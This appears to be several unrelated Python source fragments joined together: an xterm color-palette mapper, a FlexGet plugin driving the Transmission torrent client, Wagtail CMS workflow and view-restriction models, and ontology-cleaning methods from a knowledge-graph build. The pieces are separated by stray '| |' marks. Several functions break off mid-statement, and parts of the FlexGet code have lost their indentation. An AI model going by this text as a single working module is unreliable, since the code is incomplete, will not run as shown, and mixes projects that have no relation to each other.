    """Map an (R, G, B) triple to the nearest x-term 256-palette code.

    Pure grays (R == G == B) map onto the dedicated gray ramp (codes
    232-255, with near-black snapped to 0 and near-white to 15); all other
    colors map onto the 6x6x6 color cube (codes 16-231).

    BUG FIX: previously the gray-level result was computed and then
    unconditionally overwritten by the color-cube computation below (the
    function always fell through), so gray inputs got a wrong code.  The
    gray branch now returns directly.
    """
    r, g, b = rgb
    # Gray levels
    if r == g == b:
        if r < 4:
            return 0        # closer to basic black
        if r > 246:
            return 15       # closer to bright white
        if 238 <= r <= 246:
            return 255      # top of the gray ramp
        # Nearest ramp entry: ramp starts at 8 and steps by 10.
        value, mod = divmod(r - XTERM_GRAY_LEVELS_START, 10)
        if mod > 4:
            value += 1
        return XTERM_GRAY_LEVELS_OFFSET + value
    # Other colors: per channel, pick the step count whose cumulative jump
    # total is closest to the channel value.
    total = 0
    for index, c in enumerate(rgb):
        prev_tot, tot = 0, 0
        i = 0
        while tot < c and i < len(XTERM_JUMPS):
            prev_tot = tot
            tot += XTERM_JUMPS[i]
            i += 1
        val = i if abs(tot - c) <= abs(prev_tot - c) else i - 1
        total += val * XTERM_COEFF[index]
    return XTERM_COLORS_OFFSET + total
class ColoredStr(str):
    # A str subclass whose value embeds ANSI color escape codes while
    # exposing the *visible* length through len().
    def __new__(cls, string, color, palette='xterm-256'):
        """Wrap *string* in the escape sequence for *color*/*palette*.

        NOTE(review): when color == DEFAULT the plain `string` is returned
        unchanged, i.e. the result is NOT a ColoredStr in that case.
        """
        if color == DEFAULT:
            return string
        # NOTE(review): `values` is computed but never used — presumably
        # get_escape() repeats the conversion internally; confirm and drop
        # one of the two calls.
        values = get_color_values(color.lower(), palette)
        ansi_seq = get_escape(color, palette)
        literal = ansi_seq + string + ANSI_RESET
        the_string = super().__new__(cls, literal)
        the_string.length = len(string)           # visible characters only
        the_string.true_length = len(the_string)  # including escape codes
        the_string.lenesc = len(ansi_seq) + len(ANSI_RESET)
        the_string.original = string
        return the_string
    def __len__(self):
        # Report the visible length, excluding the ANSI escape sequences.
        return self.length
def __iter__(self):
return | |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from future.moves.urllib.parse import urlparse
from future.utils import text_to_native_str
import os
import logging
import base64
import re
from datetime import datetime
from datetime import timedelta
from netrc import netrc, NetrcParseError
from time import sleep
from flexget import plugin
from flexget.entry import Entry
from flexget.event import event
from flexget.utils.template import RenderError
from flexget.utils.pathscrub import pathscrub
from flexget.utils.tools import parse_timedelta
from flexget.config_schema import one_or_more
from fnmatch import fnmatch
try:
import transmissionrpc
from transmissionrpc import TransmissionError
from transmissionrpc import HTTPHandlerError
except ImportError:
# If transmissionrpc is not found, errors will be shown later
pass
log = logging.getLogger('transmission')
class TransmissionBase(object):
    """Shared base for the transmission plugins.

    Handles config normalisation (including netrc credentials), creation of
    the transmissionrpc client, and helpers to inspect torrent completion
    and seed/idle limits.
    """

    def __init__(self):
        self.client = None
        self.opener = None

    def prepare_config(self, config):
        """Normalise *config* to a dict and fill in defaults.

        A bare boolean is expanded to {'enabled': bool}.  When a 'netrc'
        path is given, username/password are read from it; failures are
        logged but not fatal.
        """
        if isinstance(config, bool):
            config = {'enabled': config}
        config.setdefault('enabled', True)
        config.setdefault('host', 'localhost')
        config.setdefault('port', 9091)
        config.setdefault('main_file_ratio', 0.9)
        if 'netrc' in config:
            netrc_path = os.path.expanduser(config['netrc'])
            try:
                # BUG FIX: authenticators() returns None when the host has
                # no entry in the netrc file; unpacking None raised
                # TypeError.  Guard and log instead.
                credentials = netrc(netrc_path).authenticators(config['host'])
                if credentials:
                    config['username'], _, config['password'] = credentials
                else:
                    log.error('netrc: no authenticator found for host: %s' % config['host'])
            except IOError as e:
                log.error('netrc: unable to open: %s' % e.filename)
            except NetrcParseError as e:
                log.error('netrc: %s, file: %s, line: %s' % (e.msg, e.filename, e.lineno))
        return config

    def create_rpc_client(self, config):
        """Connect to the transmission daemon; raises PluginError with a
        user-friendly message on failure."""
        user, password = config.get('username'), config.get('password')
        try:
            cli = transmissionrpc.Client(config['host'], config['port'], user, password)
        except TransmissionError as e:
            if isinstance(e.original, HTTPHandlerError):
                if e.original.code == 111:
                    raise plugin.PluginError("Cannot connect to transmission. Is it running?")
                elif e.original.code == 401:
                    raise plugin.PluginError("Username/password for transmission is incorrect. Cannot connect.")
                elif e.original.code == 110:
                    raise plugin.PluginError("Cannot connect to transmission: Connection timed out.")
                else:
                    raise plugin.PluginError("Error connecting to transmission: %s" % e.original.message)
            else:
                raise plugin.PluginError("Error connecting to transmission: %s" % e.message)
        return cli

    def torrent_info(self, torrent, config):
        """Return (done, main_file_location) for *torrent*.

        done is True when every selected file is fully downloaded; the
        location is only set when the largest file dominates the torrent
        (its share of totalSize >= main_file_ratio).
        """
        done = torrent.totalSize > 0
        vloc = None
        best = None
        for t in torrent.files().items():
            tf = t[1]
            if tf['selected']:
                if tf['size'] <= 0 or tf['completed'] < tf['size']:
                    done = False
                    break
                if not best or tf['size'] > best[1]:
                    best = (tf['name'], tf['size'])
        if done and best and (100 * float(best[1]) / float(torrent.totalSize)) >= (config['main_file_ratio'] * 100):
            vloc = ('%s/%s' % (torrent.downloadDir, best[0])).replace('/', os.sep)
        return done, vloc

    def check_seed_limits(self, torrent, session):
        """Return (seed_limit_ok, idle_limit_ok) applying the torrent's own
        limits (mode 1), the session's global limits (mode 0), or no limit
        (any other mode)."""
        seed_limit_ok = True  # will remain if no seed ratio defined
        idle_limit_ok = True  # will remain if no idle limit defined
        if torrent.seedRatioMode == 1:  # use torrent's own seed ratio limit
            seed_limit_ok = torrent.uploadRatio >= torrent.seedRatioLimit
        elif torrent.seedRatioMode == 0:  # use global rules
            if session.seedRatioLimited:
                seed_limit_ok = torrent.uploadRatio >= session.seedRatioLimit
        if torrent.seedIdleMode == 1:  # use torrent's own idle limit
            idle_limit_ok = torrent.date_active + timedelta(minutes=torrent.seedIdleLimit) < datetime.now()
        elif torrent.seedIdleMode == 0:  # use global rules
            if session.idle_seeding_limit_enabled:
                idle_limit_ok = torrent.date_active + timedelta(minutes=session.idle_seeding_limit) < datetime.now()
        return seed_limit_ok, idle_limit_ok

    def on_task_start(self, task, config):
        """Check transmissionrpc availability/version and (re)connect."""
        try:
            import transmissionrpc
            from transmissionrpc import TransmissionError  # noqa
            from transmissionrpc import HTTPHandlerError  # noqa
        except ImportError:
            # BUG FIX: was a bare `except:`, which also swallowed unrelated
            # errors (e.g. KeyboardInterrupt) raised during import.
            raise plugin.PluginError('Transmissionrpc module version 0.11 or higher required.', log)
        if [int(part) for part in transmissionrpc.__version__.split('.')] < [0, 11]:
            raise plugin.PluginError('Transmissionrpc module version 0.11 or higher required, please upgrade', log)
        # Mark rpc client for garbage collector so every task can start
        # a fresh new according its own config - fix to bug #2804
        self.client = None
        config = self.prepare_config(config)
        if config['enabled']:
            if task.options.test:
                log.info('Trying to connect to transmission...')
                self.client = self.create_rpc_client(config)
                if self.client:
                    log.info('Successfully connected to transmission.')
                else:
                    log.error('It looks like there was a problem connecting to transmission.')
class PluginTransmissionInput(TransmissionBase):
    """Input plugin: produce an entry for each torrent loaded in transmission."""

    schema = {
        'anyOf': [
            {'type': 'boolean'},
            {
                'type': 'object',
                'properties': {
                    'host': {'type': 'string'},
                    'port': {'type': 'integer'},
                    'netrc': {'type': 'string', 'format': 'file'},
                    'username': {'type': 'string'},
                    'password': {'type': 'string'},
                    'enabled': {'type': 'boolean'},
                    'only_complete': {'type': 'boolean'},
                },
                'additionalProperties': False,
            },
        ]
    }

    def prepare_config(self, config):
        """Apply the input-plugin-specific defaults on top of the base config."""
        config = TransmissionBase.prepare_config(self, config)
        if 'only_complete' not in config:
            config['only_complete'] = False
        return config

    def on_task_input(self, task, config):
        """Yield an entry per torrent; with ``only_complete`` set, torrents are
        skipped unless fully downloaded with seed/idle limits satisfied."""
        config = self.prepare_config(config)
        if not config['enabled']:
            return
        if not self.client:
            self.client = self.create_rpc_client(config)
        # Hack/Workaround for http://flexget.com/ticket/2002
        # TODO: Proper fix
        if 'username' in config and 'password' in config:
            self.client.http_handler.set_authentication(self.client.url, config['username'], config['password'])
        session = self.client.get_session()

        entries = []
        for torrent in self.client.get_torrents():
            seed_ratio_ok, idle_limit_ok = self.check_seed_limits(torrent, session)
            if config['only_complete']:
                if not (seed_ratio_ok and idle_limit_ok and torrent.progress == 100):
                    continue
            entry = Entry(title=torrent.name,
                          url='',
                          torrent_info_hash=torrent.hashString,
                          content_size=torrent.totalSize / (1024 * 1024))
            # Location of torrent is only valid if transmission is on same machine as flexget
            if config['host'] in ('localhost', '127.0.0.1'):
                entry['location'] = torrent.torrentFile
                entry['url'] = 'file://' + torrent.torrentFile
            for attr in ('id', 'comment', 'downloadDir', 'isFinished', 'isPrivate', 'ratio', 'status', 'date_active',
                         'date_added', 'date_done', 'date_started', 'priority', 'progress', 'secondsDownloading',
                         'secondsSeeding'):
                try:
                    entry['transmission_' + attr] = getattr(torrent, attr)
                except Exception:
                    log.debug('error when requesting transmissionrpc attribute %s', attr, exc_info=True)
            entry['transmission_trackers'] = [tracker['announce'] for tracker in torrent.trackers]
            entry['transmission_seed_ratio_ok'] = seed_ratio_ok
            entry['transmission_idle_limit_ok'] = idle_limit_ok
            entries.append(entry)
        return entries
class PluginTransmission(TransmissionBase):
"""
Add url from entry url to transmission
Example::
transmission:
host: localhost
port: 9091
netrc: /home/flexget/.tmnetrc
username: myusername
password: <PASSWORD>
path: the download location
Default values for the config elements::
transmission:
host: localhost
port: 9091
enabled: yes
"""
schema = {
'anyOf': [
{'type': 'boolean'},
{
'type': 'object',
'properties': {
'host': {'type': 'string'},
'port': {'type': 'integer'},
'netrc': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'action': {'type': 'string', 'enum': ['add', 'remove', 'purge', 'pause', 'resume']},
'path': {'type': 'string'},
'max_up_speed': {'type': 'number'},
'max_down_speed': {'type': 'number'},
'max_connections': {'type': 'integer'},
'ratio': {'type': 'number'},
'add_paused': {'type': 'boolean'},
'content_filename': {'type': 'string'},
'main_file_only': {'type': 'boolean'},
'main_file_ratio': {'type': 'number'},
'magnetization_timeout': {'type': 'integer'},
'enabled': {'type': 'boolean'},
'include_subs': {'type': 'boolean'},
'bandwidth_priority': {'type': 'number'},
'honor_limits': {'type': 'boolean'},
'include_files': one_or_more({'type': 'string'}),
'skip_files': one_or_more({'type': 'string'}),
'rename_like_files': {'type': 'boolean'},
'queue_position': {'type': 'integer'}
},
'additionalProperties': False
}
]
}
def prepare_config(self, config):
config = TransmissionBase.prepare_config(self, config)
config.setdefault('action', 'add')
config.setdefault('path', '')
config.setdefault('main_file_only', False)
config.setdefault('magnetization_timeout', 0)
config.setdefault('include_subs', False)
config.setdefault('rename_like_files', False)
config.setdefault('include_files', [])
return config
@plugin.priority(120)
def on_task_download(self, task, config):
"""
Call download plugin to generate the temp files we will load
into deluge then verify they are valid torrents
"""
config = self.prepare_config(config)
if not config['enabled']:
return
# If the download plugin is not enabled, we need to call it to get our temp .torrent files
if 'download' not in task.config:
download = plugin.get('download', self)
for entry in task.accepted:
if entry.get('transmission_id'):
# The torrent is already loaded in deluge, we don't need to get anything
continue
if config['action'] != 'add' and entry.get('torrent_info_hash'):
# If we aren't adding the torrent new, all we need is info hash
continue
download.get_temp_file(task, entry, handle_magnets=True, fail_html=True)
@plugin.priority(135)
def on_task_output(self, task, config):
config = self.prepare_config(config)
# don't add when learning
if task.options.learn:
return
if not config['enabled']:
return
# Do not run if there is nothing to do
if not task.accepted:
return
if self.client is None:
self.client = self.create_rpc_client(config)
if self.client:
log.debug('Successfully connected to transmission.')
else:
raise plugin.PluginError("Couldn't connect to transmission.")
session_torrents = self.client.get_torrents()
for entry in task.accepted:
if task.options.test:
log.info('Would %s %s in transmission.', config['action'], entry['title'])
continue
# Compile user options into appropriate dict
options = self._make_torrent_options_dict(config, entry)
torrent_info = None
for t in session_torrents:
if (t.hashString.lower() == entry.get('torrent_info_hash', '').lower() or
t.id == entry.get('transmission_id')):
torrent_info = t
log.debug('Found %s already loaded in transmission as %s', entry['title'], torrent_info.name)
break
if not torrent_info:
if config['action'] != 'add':
log.warning('Cannot %s %s because it is not loaded in transmission.',
config['action'], entry['title'])
continue
downloaded = not entry['url'].startswith('magnet:')
# Check that file is downloaded
if downloaded and 'file' not in entry:
entry.fail('`file` field missing?')
continue
# Verify the temp file exists
if downloaded and not os.path.exists(entry['file']):
tmp_path = os.path.join(task.manager.config_base, 'temp')
log.debug('entry: %s', entry)
log.debug('temp: %s', ', '.join(os.listdir(tmp_path)))
entry.fail("Downloaded temp file '%s' doesn't exist!?" % entry['file'])
continue
try:
if downloaded:
with open(entry['file'], 'rb') as f:
filedump = base64.b64encode(f.read()).decode('utf-8')
torrent_info = self.client.add_torrent(filedump, 30, **options['add'])
else:
# we need to set paused to false so the magnetization begins immediately
options['add']['paused'] = False
torrent_info = self.client.add_torrent(entry['url'], timeout=30, **options['add'])
except TransmissionError as e:
log.debug('TransmissionError', exc_info=True)
log.debug('Failed options dict: %s', options['add'])
msg = 'Error adding {} to transmission. TransmissionError: {}'.format(
entry['title'], e.message or 'N/A')
log.error(msg)
entry.fail(msg)
continue
log.info('"%s" torrent added to transmission', entry['title'])
# The info returned by the add call is incomplete, refresh it
torrent_info = self.client.get_torrent(torrent_info.id)
try:
total_size = torrent_info.totalSize
main_id = None
find_main_file = options['post'].get('main_file_only') or 'content_filename' in options['post']
skip_files = options['post'].get('skip_files')
# We need to index the files if any of the following are defined
if find_main_file or skip_files:
file_list | |
copy to the same tree otherwise it will be on infinite loop
if recursive and (self.page == destination or destination.is_descendant_of(self.page)):
return False
# reject inactive users early
if not self.user.is_active:
return False
# reject early if pages of this type cannot be created at the destination
if not self.page.specific_class.can_create_at(destination):
return False
# skip permission checking for super users
if self.user.is_superuser:
return True
# Inspect permissions on the destination
destination_perms = self.user_perms.for_page(destination)
if not destination.specific_class.creatable_subpage_models():
return False
# we always need at least add permission in the target
if 'add' not in destination_perms.permissions:
return False
return True
def can_view_revisions(self):
    # Revision history is available for every page except the root node.
    if self.page_is_root:
        return False
    return True
class PageViewRestriction(BaseViewRestriction):
    """A view restriction attached to a single page in the tree."""

    page = models.ForeignKey(
        'Page', verbose_name=_('page'), related_name='view_restrictions', on_delete=models.CASCADE
    )

    passed_view_restrictions_session_key = 'passed_page_view_restrictions'

    class Meta:
        verbose_name = _('page view restriction')
        verbose_name_plural = _('page view restrictions')

    def _log_restriction(self, specific_instance, action, user):
        """Record ``action`` for this restriction against the specific page."""
        PageLogEntry.objects.log_action(
            instance=specific_instance,
            action=action,
            user=user,
            data={
                'restriction': {
                    'type': self.restriction_type,
                    'title': force_str(dict(self.RESTRICTION_CHOICES).get(self.restriction_type))
                }
            }
        )

    def save(self, user=None, **kwargs):
        """
        Custom save handler to include logging.

        :param user: the user adding/updating the view restriction
        """
        specific_instance = self.page.specific
        is_new = self.id is None  # must be checked before save() assigns a pk
        super().save(**kwargs)
        if specific_instance:
            action = 'wagtail.view_restriction.create' if is_new else 'wagtail.view_restriction.edit'
            self._log_restriction(specific_instance, action, user)

    def delete(self, user=None, **kwargs):
        """
        Custom delete handler to aid in logging.

        :param user: the user removing the view restriction
        """
        specific_instance = self.page.specific
        if specific_instance:
            self._log_restriction(specific_instance, 'wagtail.view_restriction.delete', user)
        return super().delete(**kwargs)
class WorkflowPage(models.Model):
    """Assigns a Workflow to a page (and, implicitly, its subtree)."""

    page = models.OneToOneField(
        'Page',
        verbose_name=_('page'),
        on_delete=models.CASCADE,
        primary_key=True,
        unique=True
    )
    workflow = models.ForeignKey(
        'Workflow',
        related_name='workflow_pages',
        verbose_name=_('workflow'),
        on_delete=models.CASCADE,
    )

    def get_pages(self):
        """
        Returns a queryset of pages that are affected by this WorkflowPage link.

        This includes all descendants of the page excluding any that have other WorkflowPages.
        """
        pages = Page.objects.descendant_of(self.page, inclusive=True)
        other_links = WorkflowPage.objects.exclude(pk=self.pk).filter(
            page_id__in=pages.values_list('id', flat=True)
        )
        # Carve out the subtree claimed by every more specific WorkflowPage link
        for sub_path, sub_depth in other_links.values_list('page__path', 'page__depth'):
            pages = pages.exclude(path__startswith=sub_path, depth__gte=sub_depth)
        return pages

    class Meta:
        verbose_name = _('workflow page')
        verbose_name_plural = _('workflow pages')
class WorkflowTask(Orderable):
    # Ordered through-model linking a Workflow to one of its Tasks.
    # NOTE(review): verbose_name=_('workflow_tasks') looks like it was meant to be a
    # human-readable label (e.g. 'workflow task'); confirm before changing, since it
    # is a translated string.
    workflow = ParentalKey('Workflow', on_delete=models.CASCADE, verbose_name=_('workflow_tasks'),
                           related_name='workflow_tasks')
    # Only tasks flagged active may be chosen for a workflow
    task = models.ForeignKey('Task', on_delete=models.CASCADE, verbose_name=_('task'), related_name='workflow_tasks',
                             limit_choices_to={'active': True})

    class Meta(Orderable.Meta):
        # A given task can appear at most once per workflow
        unique_together = [('workflow', 'task')]
        verbose_name = _('workflow task order')
        verbose_name_plural = _('workflow task orders')
class TaskManager(models.Manager):
    """Manager for Task providing a convenience ``active()`` filter."""

    def active(self):
        # Only tasks flagged as active may be added to workflows.
        return self.filter(active=True)
class Task(models.Model):
    """Base class for workflow tasks.

    Concrete subclasses (e.g. GroupApprovalTask) supply the moderation
    behaviour; ``content_type`` records which subclass a row belongs to so
    that ``specific`` can downcast a generic Task instance.
    """
    name = models.CharField(max_length=255, verbose_name=_('name'))
    content_type = models.ForeignKey(
        ContentType,
        verbose_name=_('content type'),
        related_name='wagtail_tasks',
        on_delete=models.CASCADE
    )
    active = models.BooleanField(verbose_name=_('active'), default=True, help_text=_(
        "Active tasks can be added to workflows. Deactivating a task does not remove it from existing workflows."))
    objects = TaskManager()

    # Fields exposed on the admin create/edit forms
    admin_form_fields = ['name']
    admin_form_readonly_on_edit_fields = ['name']

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        if not self.id:
            # this model is being newly created
            # rather than retrieved from the db;
            if not self.content_type_id:
                # set content type to correctly represent the model class
                # that this was created as
                self.content_type = ContentType.objects.get_for_model(self)

    def __str__(self):
        return self.name

    @property
    def workflows(self):
        """Returns all ``Workflow`` instances that use this task"""
        return Workflow.objects.filter(workflow_tasks__task=self)

    @property
    def active_workflows(self):
        """Return a ``QuerySet`` of active workflows that this task is part of"""
        return Workflow.objects.active().filter(workflow_tasks__task=self)

    @classmethod
    def get_verbose_name(cls):
        """
        Returns the human-readable "verbose name" of this task model e.g "Group approval task".
        """
        # This is similar to doing cls._meta.verbose_name.title()
        # except this doesn't convert any characters to lowercase
        return capfirst(cls._meta.verbose_name)

    @cached_property
    def specific(self):
        """
        Return this Task in its most specific subclassed form.
        """
        # the ContentType.objects manager keeps a cache, so this should potentially
        # avoid a database lookup over doing self.content_type. I think.
        content_type = ContentType.objects.get_for_id(self.content_type_id)
        model_class = content_type.model_class()
        if model_class is None:
            # Cannot locate a model class for this content type. This might happen
            # if the codebase and database are out of sync (e.g. the model exists
            # on a different git branch and we haven't rolled back migrations before
            # switching branches); if so, the best we can do is return the task
            # unchanged.
            return self
        elif isinstance(self, model_class):
            # self is already an instance of the most specific class
            return self
        else:
            return content_type.get_object_for_this_type(id=self.id)

    # Subclasses may override this to use a custom TaskState subclass
    task_state_class = None

    @classmethod
    def get_task_state_class(cls):
        """Return the TaskState model class used to track this task's progress."""
        # IDIOM FIX: the first parameter of a classmethod is the class itself,
        # so it is named ``cls`` (was previously named ``self``).
        return cls.task_state_class or TaskState

    def start(self, workflow_state, user=None):
        """Start this task on the provided workflow state by creating an instance of TaskState"""
        task_state = self.get_task_state_class()(workflow_state=workflow_state)
        task_state.status = TaskState.STATUS_IN_PROGRESS
        task_state.page_revision = workflow_state.page.get_latest_revision()
        task_state.task = self
        task_state.save()
        task_submitted.send(sender=task_state.specific.__class__, instance=task_state.specific, user=user)
        return task_state

    @transaction.atomic
    def on_action(self, task_state, user, action_name, **kwargs):
        """Performs an action on a task state determined by the ``action_name`` string passed"""
        if action_name == 'approve':
            task_state.approve(user=user, **kwargs)
        elif action_name == 'reject':
            task_state.reject(user=user, **kwargs)

    def user_can_access_editor(self, page, user):
        """Returns True if a user who would not normally be able to access the editor for the page should be able to if the page is currently on this task.
        Note that returning False does not remove permissions from users who would otherwise have them."""
        return False

    def page_locked_for_user(self, page, user):
        """Returns True if the page should be locked to a given user's edits. This can be used to prevent editing by non-reviewers."""
        return False

    def user_can_lock(self, page, user):
        """Returns True if a user who would not normally be able to lock the page should be able to if the page is currently on this task.
        Note that returning False does not remove permissions from users who would otherwise have them."""
        return False

    def user_can_unlock(self, page, user):
        """Returns True if a user who would not normally be able to unlock the page should be able to if the page is currently on this task.
        Note that returning False does not remove permissions from users who would otherwise have them."""
        return False

    def get_actions(self, page, user):
        """
        Get the list of action strings (name, verbose_name, whether the action requires additional data - see
        ``get_form_for_action``) for actions the current user can perform for this task on the given page.
        These strings should be the same as those able to be passed to ``on_action``
        """
        return []

    def get_form_for_action(self, action):
        """Return the form class used to collect extra data for ``action``."""
        return TaskStateCommentForm

    def get_template_for_action(self, action):
        """Return the template name rendered for ``action`` ('' means the default)."""
        return ''

    def get_task_states_user_can_moderate(self, user, **kwargs):
        """Returns a ``QuerySet`` of the task states the current user can moderate"""
        return TaskState.objects.none()

    @classmethod
    def get_description(cls):
        """Returns the task description."""
        return ''

    @transaction.atomic
    def deactivate(self, user=None):
        """Set ``active`` to False and cancel all in progress task states linked to this task"""
        self.active = False
        self.save()
        in_progress_states = TaskState.objects.filter(task=self, status=TaskState.STATUS_IN_PROGRESS)
        for state in in_progress_states:
            state.cancel(user=user)

    class Meta:
        verbose_name = _('task')
        verbose_name_plural = _('tasks')
class WorkflowManager(models.Manager):
    """Manager for Workflow providing a convenience ``active()`` filter."""

    def active(self):
        # Only active workflows may be assigned to pages.
        return self.filter(active=True)
class Workflow(ClusterableModel):
    """An ordered sequence of moderation Tasks that pages pass through."""
    name = models.CharField(max_length=255, verbose_name=_('name'))
    active = models.BooleanField(verbose_name=_('active'), default=True, help_text=_(
        "Active workflows can be added to pages. Deactivating a workflow does not remove it from existing pages."))
    objects = WorkflowManager()

    def __str__(self):
        return self.name

    @property
    def tasks(self):
        """Returns all ``Task`` instances linked to this workflow"""
        # Ordered by the through-model's sort_order so tasks run in sequence
        return Task.objects.filter(workflow_tasks__workflow=self).order_by('workflow_tasks__sort_order')

    @transaction.atomic
    def start(self, page, user):
        """Initiates a workflow by creating an instance of ``WorkflowState``"""
        state = WorkflowState(page=page, workflow=self, status=WorkflowState.STATUS_IN_PROGRESS, requested_by=user)
        state.save()
        # state.update() is defined elsewhere -- presumably advances the state
        # to its first task; TODO confirm
        state.update(user=user)
        workflow_submitted.send(sender=state.__class__, instance=state, user=user)
        # current_task_state may be None if update() already completed the workflow
        next_task_data = None
        if state.current_task_state:
            next_task_data = {
                'id': state.current_task_state.task.id,
                'title': state.current_task_state.task.name,
            }
        PageLogEntry.objects.log_action(
            instance=page,
            action='wagtail.workflow.start',
            data={
                'workflow': {
                    'id': self.id,
                    'title': self.name,
                    'status': state.status,
                    'next': next_task_data,
                    'task_state_id': state.current_task_state.id if state.current_task_state else None,
                }
            },
            revision=page.get_latest_revision(),
            user=user,
        )
        return state

    @transaction.atomic
    def deactivate(self, user=None):
        """Sets the workflow as inactive, and cancels all in progress instances of ``WorkflowState`` linked to this workflow"""
        self.active = False
        in_progress_states = WorkflowState.objects.filter(workflow=self, status=WorkflowState.STATUS_IN_PROGRESS)
        for state in in_progress_states:
            state.cancel(user=user)
        # Detach the workflow from every page it was assigned to
        WorkflowPage.objects.filter(workflow=self).delete()
        self.save()

    def all_pages(self):
        """
        Returns a queryset of all the pages that this Workflow applies to.
        """
        pages = Page.objects.none()
        # Union of the page subtrees covered by each WorkflowPage assignment
        for workflow_page in self.workflow_pages.all():
            pages |= workflow_page.get_pages()
        return pages

    class Meta:
        verbose_name = _('workflow')
        verbose_name_plural = _('workflows')
class GroupApprovalTask(Task):
    """Workflow task requiring approval from a member of specific user groups."""
    groups = models.ManyToManyField(Group, verbose_name=_('groups'), help_text=_('Pages at this step in a workflow will be moderated or approved by these groups of users'))

    admin_form_fields = Task.admin_form_fields + ['groups']
    # Render the group selection as checkboxes on the admin form
    admin_form_widgets = {
        'groups': forms.CheckboxSelectMultiple,
    }
def start(self, workflow_state, user=None):
    """Start the group approval task, first releasing any page lock held by a
    user who is not in one of this task's approval groups (so reviewers are
    not locked out of the page)."""
    if workflow_state.page.locked_by:
        # If the person who locked the page isn't in one of the groups, unlock the page
        if not workflow_state.page.locked_by.groups.filter(id__in=self.groups.all()).exists():
            workflow_state.page.locked = False
            workflow_state.page.locked_by = None
            workflow_state.page.locked_at = None
            workflow_state.page.save(update_fields=['locked', 'locked_by', 'locked_at'])
    return super().start(workflow_state, user=user)
def user_can_access_editor(self, page, | |
for x in self.ont_graph if bad_content in str(x[0]) or bad_content in str(x[2])]
for e in bad_triple: # repair bad triple -- assuming for now the errors are mis-typed string errors
self.ont_graph.add((e[0], e[1], Literal(str(e[2]), datatype=schema.string))); self.ont_graph.remove(e)
self.ontology_info[key]['ValueErrors'] = errors[error_key] # update ontology information dictionary
return None
def fixes_identifier_errors(self) -> None:
    """Identifies identifier prefix errors (e.g. "PRO" for the Protein Ontology, which should be "PR"). This is a
    tricky task to do in an automated manner and is something that should be updated if any new ontologies are
    added to the PheKnowLator build. Currently it checks and logs any hits, but only fixes the following known
    errors: Vaccine Ontology: "PRO" which should be "PR".

    Returns:
        None.
    """
    log_str = 'Fixing Identifier Errors'; print(log_str); logger.info(log_str)

    known_errors = ['PRO', 'PR']  # bad prefix and its correct replacement
    kg_classes, bad_cls, key = gets_ontology_classes(self.ont_graph), set(), self.ont_file_location
    class_list = [res for res in kg_classes if isinstance(res, URIRef) and 'obo/' in str(res)]
    all_cls = set([x.split('/')[-1].split('_')[0] for x in class_list])
    # prefixes that are substrings of one another are flagged as possible errors
    errors = [x for x in all_cls if any(i for i in all_cls if i != x and (i in x or x in i))]
    # provisional entry; overwritten below with the identifiers actually repaired
    self.ontology_info[key]['IdentifierErrors'] = 'Possible ' + '-'.join(errors) if len(errors) > 0 else 'None'
    bad_prefix = 'http://purl.obolibrary.org/obo/{}_'.format(known_errors[0])  # hoisted loop invariant
    # BUGFIX: iterate a snapshot of the graph -- the loop body adds and removes
    # triples, and mutating an rdflib Graph while iterating it is unsafe.
    for edge in list(self.ont_graph):
        if bad_prefix in str(edge[0]):
            self.ont_graph.add((URIRef(str(edge[0]).replace(known_errors[0], known_errors[1])), edge[1], edge[2]))
            self.ont_graph.remove(edge); bad_cls.add(str(edge[0]))
        if bad_prefix in str(edge[2]):
            self.ont_graph.add((edge[0], edge[1], URIRef(str(edge[2]).replace(known_errors[0], known_errors[1]))))
            self.ont_graph.remove(edge); bad_cls.add(str(edge[2]))
    self.ontology_info[key]['IdentifierErrors'] = ', '.join(list(bad_cls)) if len(bad_cls) > 0 else 'None'

    return None
def path_finder(self, triples: List, master_triples: Set) -> Set:
    """Recursively collects all triples reachable from BNodes in the input triple list.

    The head of the ``triples`` worklist is popped; if its subject is a BNode, the triple
    is added to ``master_triples`` and the graph is searched for further triples attached
    to that BNode. Newly found triples that lead to more BNodes are appended to the
    worklist; otherwise they are accumulated directly. Recursion stops once the worklist
    contains no BNode-rooted triples.

    NOTE(review): recursion depth grows with the size of the BNode closure; a very large
    anonymous-node structure could hit Python's recursion limit -- confirm acceptable.

    Args:
        triples: A list of triples where each item in the list is an RDFLib object.
        master_triples: A set of triples accumulated so far, each an RDFLib object.

    Returns:
        triple_list: A set of triples, where each item is an RDFLib object.
    """
    if len(triples) != 0 and len([x for x in triples if isinstance(x[0], BNode)]) > 0:
        s, p, o = triples.pop(0)  # process the head of the worklist
        if isinstance(s, BNode) and (s, p, o) not in master_triples:
            master_triples |= {(s, p, o)}
            # gather every triple pointing out of or into this BNode
            out_edges = set(self.ont_graph.triples((s, None, None)))
            in_edges = set(self.ont_graph.triples((None, None, s)))
            new_trips = [x for x in out_edges | in_edges if x not in triples and x not in master_triples]
            new_bnodes = [x for x in new_trips if isinstance(x[2], BNode)]
            # only keep expanding when the new triples lead to further BNodes
            if len(new_trips) > 0 and len(new_bnodes) > 0: triples += new_trips
            else: master_triples |= set(new_trips)
        else:
            if (s, p, o) not in master_triples: master_triples |= {(s, p, o)}
        return self.path_finder(triples, master_triples)
    else: return master_triples | set(triples)
def removes_deprecated_obsolete_entities(self) -> None:
    """Identifies and removes all deprecated and obsolete classes.

    Three sources of removals are combined: entities flagged owl:deprecated, subclasses of
    oboInOwl:ObsoleteClass, and entities whose annotation text starts with "OBSOLETE". For
    every such node, its direct axioms plus the closure of attached BNode triples are
    removed from the graph.

    Returns:
        None.
    """
    log_str = 'Removing Deprecated and Obsolete Classes'; print(log_str); logger.info(log_str)

    key = self.ont_file_location  # (unused local `ont` removed)
    dep_cls = set(self.ont_graph.subjects(OWL.deprecated, None))
    obs_cls = set(self.ont_graph.subjects(RDFS.subClassOf, oboinowl.ObsoleteClass))
    # entities marked obsolete only via annotation text, not already counted above
    obs_oth = set([x[0] for x in self.ont_graph if
                   (str(x[2]).startswith('OBSOLETE. ') or
                    str(x[2]).lower().startswith('obsolete ')) and x[0] not in obs_cls | dep_cls])
    for node in tqdm(dep_cls | obs_cls | obs_oth):
        axioms = set(self.ont_graph.triples((node, None, None))) | set(self.ont_graph.triples((None, None, node)))
        bnode_triples = set([x for x in axioms if isinstance(x[0], BNode)])
        triples = self.path_finder(list(bnode_triples), set())
        self.ont_graph = remove_edges_from_graph(self.ont_graph, axioms | triples)
